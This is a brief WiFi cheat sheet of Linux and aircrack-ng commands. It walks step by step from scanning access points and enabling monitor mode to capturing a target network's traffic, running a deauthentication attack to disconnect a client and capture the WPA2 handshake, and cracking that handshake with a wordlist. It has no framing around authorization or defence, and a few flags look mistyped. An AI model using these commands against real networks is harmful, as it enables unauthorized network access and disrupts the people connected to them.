WiFi Cheat Sheet
nmcli device status
Prints the connected wireless adapters
iwlist [adapter] scan
Scans local AP’s (access points)
iwlist [adapter] scan | egrep ‘Address|ESSID’
Narrows down output of previous scan
airmon-ng start [adapter]
Starts monitor mode on selected adapter
iwconfig | grep ‘Monitor’
Shows the monitor mode device
airodump-ng [adapter]
Shows the access points and devices you can capture
Capture WPA2
To capture packets from an access point use the following command:
airodump-ng -c [channel of access point] -bssid [access point] -w [filename] [adapter]
Leave this running in a sole terminal
To perform a deauthentication attack use the following command in a second terminal window:
aireplay-ng -0 1 -a [accesspoint] -c [client address] [adapter]
Check on the first terminal or tab, we should now have captured the handshake
To use a word list against the captured handshake use the following command:
aircrack-ng -0 -w [wordlist] [captured filename(.cap)]